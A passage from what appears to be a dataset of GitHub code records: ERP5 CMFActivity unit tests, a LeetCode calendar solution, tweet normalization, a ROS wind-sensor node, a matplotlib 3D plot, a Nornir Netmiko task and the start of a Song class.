ActivityConnection\n \"\"\"\n # replace the activity connector with a standard ZMySQLDA one\n portal = self.portal\n activity_tool = portal.portal_activities\n stdconn = portal.cmf_activity_sql_connection\n portal._delObject('cmf_activity_sql_connection')\n portal.manage_addProduct['ZMySQLDA'].manage_addZMySQLConnection(\n stdconn.id,\n stdconn.title,\n stdconn.connection_string,\n )\n oldconn = portal.cmf_activity_sql_connection\n self.assertEqual(oldconn.meta_type, 'Z MySQL Database Connection')\n # force rebootstrap and check that migration of the connection happens\n # automatically\n from Products.ERP5Type.dynamic import portal_type_class\n portal_type_class._bootstrapped.clear()\n portal_type_class.synchronizeDynamicModules(activity_tool, True)\n activity_tool.activate(activity='SQLQueue').getId()\n self.tic()\n newconn = portal.cmf_activity_sql_connection\n self.assertEqual(newconn.meta_type, 'CMFActivity Database Connection')\n\n def test_connection_installable(self):\n \"\"\"\n Test if the cmf_activity_sql_connector can be installed\n \"\"\"\n # delete the activity connection\n portal = self.portal\n stdconn = portal.cmf_activity_sql_connection\n portal._delObject('cmf_activity_sql_connection')\n # check the installation form can be rendered\n portal.manage_addProduct['CMFActivity'].connectionAdd(\n portal.REQUEST\n )\n # check it can be installed\n portal.manage_addProduct['CMFActivity'].manage_addActivityConnection(\n stdconn.id,\n stdconn.title,\n stdconn.connection_string\n )\n newconn = portal.cmf_activity_sql_connection\n self.assertEqual(newconn.meta_type, 'CMFActivity Database Connection')\n\n def test_connection_sortkey(self):\n \"\"\"\n Check that SQL connection has properly initialized sort key,\n even when its container (ZODB connection) is reused by another thread.\n \"\"\"\n def sortKey():\n app = ZopeTestCase.app()\n try:\n c = app[self.getPortalName()].cmf_activity_sql_connection()\n return app._p_jar, c.sortKey()\n finally:\n ZopeTestCase.close(app)\n jar, sort_key = sortKey()\n self.assertNotEqual(1, sort_key)\n result = []\n t = threading.Thread(target=lambda: result.extend(sortKey()))\n t.daemon = True\n t.start()\n t.join()\n self.assertIs(result[0], jar)\n self.assertEqual(result[1], sort_key)\n\n def test_onErrorCallback(self):\n activity_tool = self.portal.portal_activities\n obj = activity_tool.newActiveProcess()\n self.tic()\n def _raise(exception): # I wish exceptions are callable raising themselves\n raise exception\n def doSomething(self, conflict_error, cancel):\n self.activity_count += 1\n error = ConflictError() if conflict_error else Exception()\n def onError(exc_type, exc_value, traceback):\n assert exc_value is error\n env = self.getActivityRuntimeEnvironment()\n weakref_list.extend(map(weakref.ref, (env, env._message)))\n self.on_error_count += 1\n return cancel\n self.getActivityRuntimeEnvironment().edit(on_error_callback=onError)\n if not self.on_error_count:\n if not conflict_error:\n raise error\n transaction.get().addBeforeCommitHook(_raise, (error,))\n obj.__class__.doSomething = doSomething\n try:\n for activity in ActivityTool.activity_dict:\n for conflict_error in False, True:\n weakref_list = []\n obj.activity_count = obj.on_error_count = 0\n obj.activate(activity=activity).doSomething(conflict_error, True)\n self.tic()\n self.assertEqual(obj.activity_count, 0)\n self.assertEqual(obj.on_error_count, 1)\n gc.collect()\n self.assertEqual([x() for x in weakref_list], [None, None])\n weakref_list = []\n 
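# Same scenario, but the callback does not cancel: the message is retried\n # and succeeds on the second attempt, so the method body runs once.\n 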
obj.activate(activity=activity).doSomething(conflict_error, False)\n obj.on_error_count = 0\n self.tic()\n self.assertEqual(obj.activity_count, 1)\n self.assertEqual(obj.on_error_count, 1)\n gc.collect()\n self.assertEqual([x() for x in weakref_list], [None, None])\n finally:\n del obj.__class__.doSomething\n\n def test_duplicateGroupedMessage(self):\n activity_tool = self.portal.portal_activities\n obj = activity_tool.newActiveProcess()\n obj.reindexObject(activate_kw={'tag': 'foo', 'after_tag': 'bar'})\n self.commit()\n # Check that both messages were inserted.\n # Also serves as a sanity check on indexation activities group_method_id.\n indexation_group_metdod_id = 'portal_catalog/catalogObjectList'\n self.assertEqual(\n len([\n x\n for x in activity_tool.getMessageList(path=obj.getPath())\n if x.activity_kw.get('group_method_id') == indexation_group_metdod_id\n ]),\n 2,\n )\n invoked = []\n def invokeGroup(self, method_id, message_list, *args):\n # Ignore any other activity which may be spawned from these catalog\n # indexations (ex: fulltext indexations).\n if method_id == indexation_group_metdod_id:\n invoked.append(len(message_list))\n return ActivityTool_invokeGroup(self, method_id, message_list, *args)\n ActivityTool_invokeGroup = activity_tool.__class__.invokeGroup\n try:\n activity_tool.__class__.invokeGroup = invokeGroup\n self.tic()\n finally:\n activity_tool.__class__.invokeGroup = ActivityTool_invokeGroup\n self.assertEqual(invoked, [1])\n\n def test_mergeParent(self):\n category_tool = self.portal.portal_categories\n # Test data: c0\n # / \\\n # c1 c2\n # / \\ |\n # c3 c4 c5\n c = [category_tool.newContent()]\n for i in xrange(5):\n c.append(c[i//2].newContent())\n self.tic()\n def activate(i, priority=1, **kw):\n kw.setdefault('merge_parent', c[0].getPath())\n c[i].activate(priority=priority, **kw).doSomething()\n def check(*expected):\n self.tic()\n self.assertEqual(tuple(invoked), expected)\n del invoked[:]\n invoked = []\n def doSomething(self):\n invoked.append(c.index(self))\n Base.doSomething = doSomething\n try:\n for t in (0, 1), (0, 4, 2), (1, 0, 5), (3, 2, 0):\n for p, i in enumerate(t):\n activate(i, p)\n check(0)\n activate(1, 0); activate(5, 1); check(1, 5)\n activate(3, 0); activate(1, 1); check(1)\n activate(2, 0); activate(1, 1); activate(4, 2); check(2, 1)\n activate(4, 0); activate(5, 1); activate(3, 2); check(4, 5, 3)\n activate(3, 0, merge_parent=c[1].getPath()); activate(0, 1); check(3, 0)\n # Following test shows that a child can be merged with a parent even if\n # 'merge_parent' is not specified. 
This can't be avoided without loading\n # all found duplicates, which would be bad for performance.\n activate(0, 0); activate(4, 1, merge_parent=None); check(0)\n finally:\n del Base.doSomething\n def activate(i, priority=1, **kw):\n c[i].activate(group_method_id='portal_categories/invokeGroup',\n merge_parent=c[(i-1)//2 or i].getPath(),\n priority=priority, **kw).doSomething()\n def invokeGroup(self, message_list):\n r = []\n for m in message_list:\n m.result = r.append(c.index(m.object))\n r.sort()\n invoked.append(r)\n category_tool.__class__.invokeGroup = invokeGroup\n try:\n activate(5, 0); activate(1, 1); check([1, 5])\n activate(4, 0); activate(1, 1); activate(2, 0); check([1, 2])\n activate(1, 0); activate(5, 0); activate(3, 1); check([1, 5])\n for p, i in enumerate((5, 3, 2, 1, 4)):\n activate(i, p, group_id=str(2 != i != 5))\n check([2], [1])\n for cost in 0.3, 0.1:\n activate(2, 0, group_method_cost=cost)\n activate(3, 1); activate(4, 2); activate(1, 3)\n check([1, 2])\n finally:\n del category_tool.__class__.invokeGroup\n category_tool._delObject(c[0].getId())\n self.tic()\n\n def test_getMessageList(self):\n activity_tool = self.portal.portal_activities\n module = self.portal.person_module\n module.activate(after_tag=\"foo\").getUid()\n module.activate(activity='SQLQueue', tag=\"foo\").getId()\n activity_tool.activate(priority=-1).getId()\n def check(expected, **kw):\n self.assertEqual(expected, len(activity_tool.getMessageList(**kw)))\n def test(check=lambda _, **kw: check(0, **kw)):\n check(2, path=module.getPath())\n check(3, method_id=(\"getId\", \"getUid\"))\n check(1, tag=\"foo\")\n check(0, tag=\"foo\", method_id=\"getUid\")\n check(1, processing_node=-1)\n check(3, processing_node=range(-5,5))\n test()\n self.commit()\n test(check)\n self.tic()\n test()\n\n def test_MessageNonExecutable(self):\n message_list = self.portal.MailHost._message_list\n del message_list[:]\n activity_tool = self.portal.portal_activities\n\n kw = {}\n self._catch_log_errors()\n try:\n activity_tool.activity_failure_mail_notification = True\n for kw['activity'] in ActivityTool.activity_dict:\n for kw['group_method_id'] in '', None:\n obj = activity_tool.newActiveProcess()\n self.tic()\n obj.activate(**kw).getId()\n activity_tool._delOb(obj.getId())\n obj = activity_tool.newActiveProcess(id=obj.getId(),\n is_indexable=False)\n self.commit()\n self.assertEqual(1, activity_tool.countMessage())\n self.flushAllActivities()\n sender, recipients, mail = message_list.pop()\n self.assertIn('UID mismatch', mail)\n m, = activity_tool.getMessageList()\n self.assertEqual(m.processing_node, INVOKE_ERROR_STATE)\n obj.flushActivity()\n obj.activate(**kw).getId()\n activity_tool._delOb(obj.getId())\n self.commit()\n self.assertEqual(1, activity_tool.countMessage())\n activity_tool.tic()\n cmf_activty_log, = [log for log in self.logged if 'CMFActivity' in log.name]\n self.logged = []\n self.assertIn('no object found', cmf_activty_log.getMessage())\n finally:\n self._ignore_log_errors()\n self.assertFalse(message_list)\n\n def test_activateByPath(self):\n organisation = self.getOrganisation()\n self.portal.portal_activities.activateObject(\n organisation.getPath(),\n activity='SQLDict',\n active_process=None\n ).getTitle()\n self.tic()\n\n def test_activateOnZsqlBrain(self):\n organisation, = self.getOrganisationModule().searchFolder(\n id=self.company_id)\n organisation.activate().getTitle()\n self.tic()\n\n def test_flushActivitiesOnDelete(self):\n organisation = self.getOrganisation()\n 
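# Deleting the object flushes its pending activities; the activity created\n # on the stale wrapper below must still let tic() terminate cleanly.\n 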
organisation.getParentValue()._delObject(organisation.getId())\n organisation.activate().getTitle()\n self.tic()\n\n def test_flushActivitiesOnDeleteWithAcquierableObject(self):\n # Create an object with the same ID that can be acquired\n self.portal._setObject(self.company_id, Organisation(self.company_id))\n\n organisation = self.getOrganisation()\n organisation.getParentValue()._delObject(organisation.getId())\n organisation.reindexObject()\n self.tic()\n\n def test_failingGroupMethod(self):\n activity_tool = self.portal.portal_activities\n obj = activity_tool.newActiveProcess()\n self.tic()\n obj.x = 1\n def doSomething(self):\n self.x %= self.x\n obj.__class__.doSomething = doSomething\n try:\n activity_kw = dict(activity=\"SQLQueue\", group_method_id=None)\n obj.activate(**activity_kw).doSomething()\n obj.activate(**activity_kw).doSomething()\n obj.activate(**activity_kw).doSomething()\n self.commit()\n self.assertEqual(3, len(activity_tool.getMessageList()))\n activity_tool.tic()\n self.assertEqual(obj.x, 0)\n skipped, failed = activity_tool.getMessageList()\n self.assertEqual(0, skipped.retry)\n self.assertEqual(1, failed.retry)\n obj.x = 1\n self.commit()\n activity_tool.timeShift(VALIDATION_ERROR_DELAY)\n activity_tool.tic()\n m, = activity_tool.getMessageList()\n self.assertEqual(1, failed.retry)\n obj.x = 1\n self.commit()\n activity_tool.timeShift(VALIDATION_ERROR_DELAY)\n activity_tool.tic()\n finally:\n del obj.__class__.doSomething\n\n def test_restrictedGroupMethod(self):\n skin = self.portal.portal_skins.custom\n script_id = self.id()\n script = createZODBPythonScript(skin, script_id, \"message_list\", \"\"\"if 1:\n for m in message_list:\n m.result = m.object.getProperty(*m.args, **m.kw)\n \"\"\")\n script.manage_proxy((\"Manager\",))\n obj = self.portal.portal_activities.newActiveProcess(causality_value_list=(\n self.portal.person_module, self.portal.organisation_module))\n obj.manage_permission('Access contents information', ['Manager'])\n self.logout()\n foo = obj.activate(activity='SQLQueue',\n group_method_id=script_id,\n active_process=obj.getPath()).foo\n foo('causality', portal_type='Organisation Module')\n foo('stop_date', 'bar')\n self.tic()\n self.assertEqual(sorted(x.getResult() for x in obj.getResultList()),\n ['bar', 'organisation_module'])\n skin.manage_delObjects([script_id])\n self.tic()\n\n def test_getCurrentNode(self):\n current_node = getattr(getConfiguration(), 'product_config', {}) \\\n .get('cmfactivity', {}).get('node-id')\n if not current_node:\n current_node = getServerAddress()\n node = getCurrentNode()\n self.assertEqual(node, current_node)\n activity_node = self.portal.portal_activities.getCurrentNode()\n self.assertEqual(activity_node, current_node)\n\n def test_getServerAddress(self):\n host, port = self.startHTTPServer()\n ip = socket.gethostbyname(host)\n server_address = '%s:%s' % (ip, port)\n address = getServerAddress()\n self.assertEqual(address, server_address)\n activity_address = self.portal.portal_activities.getServerAddress()\n self.assertEqual(activity_address, server_address)\n\n def test_nodePreference(self):\n \"\"\"\n Test node preference, i.e. 
'node' parameter of activate()\n An object is activated by 2 different nodes and the 2 messages are\n processed by the node that created the newest one:\n - without node preference: they're ordered by date\n - with node preference: they're executed in reverse order (the\n processing node executes its message first even if it's newer)\n Correct ordering of queues is also checked, by including scenarios\n in which one message is in SQLDict and the other in SQLQueue.\n \"\"\"\n activity_tool = self.portal.portal_activities\n o = self.getOrganisation()\n\n node_dict = dict(activity_tool.getNodeDict())\n assert len(node_dict) == 1 and '' not in node_dict, node_dict\n before = DateTime() - 1\n\n activities = 'SQLDict', 'SQLQueue'\n for activities in product(activities, activities):\n for node, expected in (None, '12'), ('', '21'), ('same', '12'):\n o._setTitle('0')\n # The dance around getNodeDict is to simulate the creation of\n # activities from 2 different nodes. We also change title in 2\n # different ways, so that SQLDict does not merge them.\n o.activate(activity=activities[0], node=node)._setTitle('1')\n activity_tool.getNodeDict = lambda: node_dict\n node_dict[''] = ActivityTool.ROLE_PROCESSING\n o.activate(activity=activities[1], node=node, at_date=before\n )._setProperty('title', '2')\n del node_dict['']\n activity_tool._p_invalidate()\n self.commit()\n\n for title in expected:\n self.ticOnce()\n self.assertEqual(o.getTitle(), title, (activities, expected))\n self.assertFalse(activity_tool.getMessageList())\n\n def test_nodeFamilies(self):\n \"\"\"\n Test node families, i.e. 'node' parameter of activate() beyond \"\", \"same\"\n and None.\n \"\"\"\n activity_tool = self.portal.portal_activities\n node_id, = activity_tool.getNodeDict()\n other = 'boo'\n member = 'foo'\n non_member = 'bar'\n does_not_exist = 'baz'\n\n # Family declaration API\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [])\n self.assertRaises(\n ValueError,\n activity_tool.createFamily, 'same', # Reserved name\n )\n self.assertRaises(\n TypeError,\n activity_tool.createFamily, -5, # Not a string\n )\n activity_tool.createFamily(other)\n self.assertRaises(\n ValueError,\n activity_tool.createFamily, other, # Exists\n )\n activity_tool.createFamily(member)\n self.assertRaises(\n ValueError,\n activity_tool.renameFamily, other, member, # New name exists\n )\n self.assertRaises(\n ValueError,\n activity_tool.renameFamily, does_not_exist, member, # Old name does not exist\n )\n self.assertRaises(\n TypeError,\n activity_tool.renameFamily, other, -4, # New name not a string\n )\n activity_tool.deleteFamily(member)\n # Silent success\n activity_tool.deleteFamily(member)\n activity_tool.createFamily(non_member)\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [other, non_member])\n\n # API for node a-/di-ssociation with/from families\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [])\n activity_tool.addNodeToFamily(node_id, other)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other])\n # Silent success\n activity_tool.addNodeToFamily(node_id, other)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other])\n activity_tool.addNodeToFamily(node_id, non_member)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other, non_member])\n activity_tool.removeNodeFromFamily(node_id, non_member)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other])\n # Silent success\n 
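# (removing a node which is not part of the family must not raise)\n 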
activity_tool.removeNodeFromFamily(node_id, non_member)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other])\n activity_tool.createFamily(does_not_exist)\n activity_tool.addNodeToFamily(node_id, does_not_exist)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other, does_not_exist])\n activity_tool.deleteFamily(does_not_exist)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other])\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [other, non_member])\n activity_tool.renameFamily(other, member)\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [member, non_member])\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [member])\n activity_tool.createFamily(other)\n activity_tool.addNodeToFamily(node_id, other)\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [member, non_member, other])\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [member, other])\n activity_tool.deleteFamily(other)\n\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [member, non_member])\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [member])\n o = self.getOrganisation()\n for activity in 'SQLDict', 'SQLQueue':\n # Sanity check.\n self.assertEqual(self.getMessageList(activity), [])\n self.assertRaises(\n ValueError,\n o.activate, activity=activity, node=does_not_exist,\n )\n for node, expected in (member, '1'), (non_member, '0'), ('', '1'), ('same', '1'):\n o._setTitle('0')\n o.activate(activity=activity, node=node)._setTitle('1')\n self.commit()\n self.ticOnce()\n self.assertEqual(\n o.getTitle(),\n expected,\n (activity, o.getTitle(), expected),\n )\n if expected == '0':\n # The activity must still exist, waiting for a node of the\n # appropriate family.\n result = self.getMessageList(activity)\n self.assertEqual(len(result), 1)\n self.deleteMessageList(activity, result)\n\n def test_message_auto_validation(self):\n \"\"\"\n Test that messages without dependencies are directly spawned with\n processing_node=0.\n \"\"\"\n organisation = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n activity_tool = self.getActivityTool()\n organisation.activate(tag='1').getId()\n organisation.activate(tag='2', after_tag=None).getId()\n organisation.activate(tag='3', after_tag='foo').getId()\n self.commit()\n activity_tool.getMessageList()\n self.assertItemsEqual(\n [('1', 0), ('2', 0), ('3', -1)],\n [\n (x.activity_kw['tag'], x.processing_node)\n for x in self.getActivityTool().getMessageList()\n ],\n )\n self.tic()\n\n def test_activity_timeout(self):\n slow_method_id = 'Base_getSlowObjectList'\n createZODBPythonScript(\n self.portal.portal_skins.custom,\n slow_method_id,\n 'selection=None, **kw',\n \"\"\"\nfrom time import sleep\nsleep(3)\nreturn [x.getObject() for x in context.portal_catalog(limit=100)]\n \"\"\")\n\n # Set short enough activity timeout configuration\n import Products.ERP5Type.Timeout\n Products.ERP5Type.Timeout.activity_timeout = 2.0\n\n self.portal.portal_templates.activate().Base_getSlowObjectList()\n with self.assertRaises(RuntimeError):\n self.tic()\n message, = self.getMessageList('SQLDict')\n self.assertEqual(message.retry, 0)\n self.deleteMessageList(\n 'SQLDict',\n [message],\n )\n\n def test_zmi_views(self):\n # we can render ZMI view without errors or warnings\n with warnings.catch_warnings(record=True) as catched_warnings:\n self.portal.portal_activities.manage_overview()\n 
self.portal.portal_activities.manageActivities()\n self.portal.portal_activities.manageActivitiesAdvanced()\n self.portal.portal_activities.manageLoadBalancing()\n self.assertEqual(catched_warnings, [])\n\n @for_each_activity\n def testSpawnTimeUserGroupAndRoleUsedDuringExecution(self, activity):\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n # This user cannot be created by userfolder API, validating that activity\n # execution does not use it.\n # Using a PropertiedUser because it is the lowest-level class which has a\n # groups notion.\n artificial_user = PropertiedUser(\n id='this user does not exist',\n login='does not matter',\n ).__of__(self.portal.acl_users)\n artificial_user._addGroups(groups=('group 1', 'group 2'))\n artificial_user._addRoles(roles=('role 1', 'role 2'))\n initial_security_manager = getSecurityManager()\n def checkUserGroupAndRole(organisation_self):\n user = getSecurityManager().getUser()\n self.assertIs(type(aq_base(user)), PropertiedUser)\n self.assertEqual(aq_parent(user), aq_parent(artificial_user))\n self.assertEqual(user.getId(), artificial_user.getId())\n self.assertItemsEqual(user.getGroups(), artificial_user.getGroups())\n self.assertItemsEqual(user.getRoles(), artificial_user.getRoles())\n Organisation.checkUserGroupAndRole = checkUserGroupAndRole\n try:\n newSecurityManager(None, artificial_user)\n obj.activate(activity=activity).checkUserGroupAndRole()\n self.tic()\n finally:\n setSecurityManager(initial_security_manager)\n del Organisation.checkUserGroupAndRole\n\n @for_each_activity\n def test_dummyGroupMethodUser(self, activity):\n activity_tool = self.portal.portal_activities\n user_folder = self.portal.acl_users\n expected_user_list = [\n PropertiedUser(id='user1', login='user1').__of__(user_folder),\n PropertiedUser(id='user2', login='user2').__of__(user_folder),\n ]\n for index, user in enumerate(expected_user_list):\n user._addGroups(groups=['role %i' % index])\n context_list = [\n self.portal.organisation_module.newContent(portal_type='Organisation')\n for _ in expected_user_list\n ]\n self.tic()\n user_list = [None for _ in expected_user_list]\n def doSomething(self, index):\n user_list[index] = getSecurityManager().getUser()\n Organisation.doSomething = doSomething\n try:\n initial_security_manager = getSecurityManager()\n try:\n for index, (context, user) in enumerate(zip(\n context_list,\n expected_user_list,\n )):\n newSecurityManager(None, user)\n context.activate(\n activity=activity,\n group_method_id=None,\n ).doSomething(index=index)\n finally:\n setSecurityManager(initial_security_manager)\n self.tic()\n finally:\n del Organisation.doSomething\n self.assertEqual(\n [x.getRoles() for x in user_list],\n [x.getRoles() for x in expected_user_list],\n )\n","repo_name":"Nexedi/erp5","sub_path":"product/CMFActivity/tests/testCMFActivity.py","file_name":"testCMFActivity.py","file_ext":"py","file_size_in_byte":113448,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"14066948142","text":"# link: https://leetcode.com/problems/my-calendar-iii/\n# solution reference: https://leetcode.com/problems/my-calendar-iii/solution/\n\n# Sweep line algorithm\nfrom sortedcontainers import SortedDict\nclass MyCalendarThree:\n\n def __init__(self):\n self.diff = SortedDict()\n\n def book(self, start: int, end: int) -> int:\n self.diff[start] = self.diff.get(start, 0) + 1\n self.diff[end] = self.diff.get(end, 0) - 1\n\n cur = max_count = 0\n # to 
accumulate the count; the order matters here => use SortedDict\n for key in self.diff:\n cur += self.diff[key]\n max_count = max(max_count, cur)\n\n return max_count\n\n# Your MyCalendarThree object will be instantiated and called as such:\n# obj = MyCalendarThree()\n# param_1 = obj.book(start,end)\n","repo_name":"rbrn1999/leetcode-sol","sub_path":"problems/732. My Calendar III.py","file_name":"732. My Calendar III.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"32854228101","text":"import glob\nimport pandas as pd\nimport json\nfrom datetime import datetime\nimport os\nimport re\n\ndef normalize_tweet(tweet):\n if isinstance(tweet, str):\n tweet = tweet.lower()\n tweet = re.sub(r\"@[^\\s]+\", \"@user\", tweet) # Replace mentions with \"@user\"\n tweet = re.sub(r\"https?://[^\\s]+\", \"link\", tweet) # Replace URLs with \"link\"\n tweet = \" \".join(tweet.split()) # Remove extra whitespace\n else:\n tweet = str(tweet)\n\n return tweet\n\ndef process_files(folder_path, output_folder):\n # Retrieve file paths from the folder\n file_paths = glob.glob(folder_path)\n\n # Iterate over the file paths\n for file_path in file_paths:\n # Read the CSV file into a DataFrame\n df = pd.read_csv(file_path)\n\n # Apply the normalization function to each tweet\n df['normalized_tweet'] = df['full_text'].apply(normalize_tweet)\n\n # Print the first normalized tweet for demonstration\n print(df['normalized_tweet'][0])\n\n # Drop duplicates based on all columns\n df.drop_duplicates(keep='first', inplace=True)\n\n # Change the name of the file from \"staged\" to \"trusted\"\n file_name = os.path.basename(file_path)\n new_file_name = file_name.replace(\"staged\", \"trusted\")\n output_file = os.path.join(output_folder, new_file_name)\n\n # Save the DataFrame to a new CSV file\n df.to_csv(output_file, index=False)\n\ndef run_normalization(folder_path, output_folder):\n normalize_tweet(None)\n process_files(folder_path, output_folder)","repo_name":"Silly-Machine/twitter-data-engineering","sub_path":"src/data_normalization.py","file_name":"data_normalization.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"1098640982","text":"#!/usr/bin/env python\n\nimport rospy\nfrom geometry_msgs.msg import Vector3Stamped\nfrom std_msgs.msg import Float64\nfrom wind_sensor.wind_sensor import WindSensor\nimport subprocess as sp\n\n\nclass WindSensorTalker:\n def __init__(self):\n \"\"\"\n Initializes the WindSensor class that is defined in wind_sensor.py\n \"\"\"\n self.wnd = WindSensor()\n\n def talker(self):\n \"\"\"\n Initializes the 4 publishers (wind_pub, rpy_pub, temp_pub, battery_pub), then initializes the node\n as wind_sensor_node, sets the rate to the user-defined value (8 is the max of the wind sensor) and sleeps to\n let the startup and bluetooth connection finish.\n\n Makes function calls to gather the sensor readings from the wind sensor and saves them in the correct formats for\n publishing, with a check at the end that the bluetooth connectivity is still up; if it is not, the connection\n is reset, followed by a small sleep to wait for it to establish before continuing.\n \"\"\"\n wind_pub = rospy.Publisher('wind_sensor/wind_vector', Vector3Stamped, queue_size=10)\n rpy_pub = rospy.Publisher('wind_sensor/roll_pitch_yaw', Vector3Stamped, queue_size=10)\n temp_pub = rospy.Publisher('wind_sensor/temperature', 
Float64, queue_size=10)\n battery_pub = rospy.Publisher('wind_sensor/battery_voltage', Float64, queue_size=10)\n rospy.init_node('wind_sensor_node', anonymous=True, log_level=rospy.get_param(\"log_level\", rospy.INFO))\n rate = rospy.Rate(8) # refresh rate in hz\n rospy.sleep(5)\n while not rospy.is_shutdown():\n self.wnd.update()\n wind_vector = self.wnd.get_wind_vector()\n vec_msg = Vector3Stamped()\n vec_msg.header.stamp = rospy.Time.now()\n vec_msg.vector.x = -wind_vector[0]\n vec_msg.vector.y = -wind_vector[1]\n vec_msg.vector.z = 0\n\n rpy_vector = self.wnd.get_rpy()\n rpy_msg = Vector3Stamped()\n rpy_msg.header.stamp = rospy.Time.now()\n rpy_msg.vector.x = -rpy_vector[0]\n rpy_msg.vector.y = rpy_vector[1]\n rpy_msg.vector.z = -rpy_vector[2]\n\n battery_msg = Float64()\n battery_msg = self.wnd.get_battery_charge()\n\n temp_msg = Float64()\n temp_msg = self.wnd.get_temp()\n temp_msg -= 273.15 # convert to celsius from kelvin\n stdoutdata = sp.getoutput(\"hcitool con\")\n if \"DC:73:74:12:94:80\" not in stdoutdata.split():\n rospy.logerr(\"Connection Failed, Reconnecting!\")\n self.wnd.close()\n self.wnd = WindSensor()\n rospy.sleep(5)\n wind_pub.publish(vec_msg)\n rpy_pub.publish(rpy_msg)\n battery_pub.publish(battery_msg)\n temp_pub.publish(temp_msg)\n rate.sleep()\n\n\nif __name__ == '__main__':\n wnd = WindSensorTalker()\n try:\n wnd.talker()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"AutoSail-MDH/AutoSailROS","sub_path":"autosail/scripts/drivers/wind_sensor_node.py","file_name":"wind_sensor_node.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"41588407926","text":"plotfilename=\"../files/matplotlib-3d-example.png\"\ninfile = \"../files/genfromtxt_example_data.txt\"\noufile = \"../files/genfromtxt_example_plot.png\"\nimport numpy\nimport matplotlib\nimport matplotlib.pyplot\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef randrange(n, vmin, vmax):\n return (vmax - vmin)*numpy.random.rand(n) + vmin\n\ndata = numpy.genfromtxt(infile, comments=\"#\", delimiter=\"\\t\", skip_header=3)\nfig = matplotlib.pyplot.figure()\nax = fig.add_subplot(111, projection='3d')\nn = data.shape[0]\n# plot a sphere for each particle\n# colour charged particles red (charge>0), blue (charge<0) and neutrals green\nblues = data[data[:,7]<0]\nreds = data[data[:,7]>0]\ngreens=data[numpy.logical_not(numpy.logical_or(data[:,7]<0,data[:,7]>0))]\nax.scatter(blues[:,0], blues[:,1], blues[:,2], c=\"b\", edgecolors=\"face\",\n marker=\"o\", s=blues[:,6])\nax.scatter(reds[:,0], reds[:,1], reds[:,2], c=\"r\", edgecolors=\"face\",\n marker=\"o\", s=reds[:,6])\nax.scatter(greens[:,0], greens[:,1], greens[:,2], c=\"g\", edgecolors=\"face\",\n marker=\"o\", s=greens[:,6])\nax.quiver(blues[:,0], blues[:,1], blues[:,2], blues[:,3], blues[:,4],\n blues[:,5], pivot=\"tail\")\nax.quiver(reds[:,0], reds[:,1], reds[:,2], reds[:,3], reds[:,4],\n reds[:,5], pivot=\"middle\")\nax.quiver(greens[:,0], greens[:,1], greens[:,2], greens[:,3], greens[:,4],\n greens[:,5], pivot=\"tip\")\nax.set_xlabel('X Label')\nax.set_ylabel('Y Label')\nax.set_zlabel('Z Label')\nmatplotlib.pyplot.savefig(oufile)\nprint(oufile, end=\"\")\n","repo_name":"COSMOS-CTC-Cambridge/damtp-research-programming","sub_path":"codes/python/genfromtxt_example_plot.py","file_name":"genfromtxt_example_plot.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"}
+{"seq_id":"14710490296","text":"from typing import Sequence, Union, List, Any\nfrom nornir.core.task import Result, Task\nfrom nornir_netmiko.connections import CONNECTION_NAME\n\n\ndef netmiko_multiline(\n task: Task,\n commands: Sequence[Union[str, List[str]]],\n use_timing: bool = False,\n enable: bool = False,\n **kwargs: Any\n) -> Result:\n \"\"\"\n Execute Netmiko send_multiline method (or send_multiline_timing)\n\n Arguments:\n commands: List or list of lists (see Netmiko send_multiline)\n use_timing: Set to True to switch to send_multiline_timing method.\n enable: Set to True to force Netmiko .enable() call.\n kwargs: Additional arguments to pass to send_multiline method.\n\n Returns:\n Result object with the following attributes set:\n * result: String result showing you the output from commands\n \"\"\"\n net_connect = task.host.get_connection(CONNECTION_NAME, task.nornir.config)\n if enable:\n net_connect.enable()\n if use_timing:\n result = net_connect.send_multiline_timing(commands, **kwargs)\n else:\n result = net_connect.send_multiline(commands, **kwargs)\n return Result(host=task.host, result=result)\n","repo_name":"ktbyers/nornir_netmiko","sub_path":"nornir_netmiko/tasks/netmiko_multiline.py","file_name":"netmiko_multiline.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"75"} +{"seq_id":"17046472764","text":"import datetime\nimport random\nimport json\nimport mutagen\nimport os\n\nclass Song:\n\n\tdef __init__(self, title, artist, album, length):\n\t\tself.title = title\n\t\tself.artist = artist\n\t\tself.album = album\n\t\tself.length = length\n\n\t@property\n\tdef is_valid_length(self):\n\t\ti = 0\n\t\twhile i < len(self.length):\n\t\t\tif not self.length[i].isdigit() and not self.length[i] == ':':\n\t\t\t\treturn False\n\t\t\ti += 1\n\n\t\tarray = self.length.split(':')\n\t\ti = 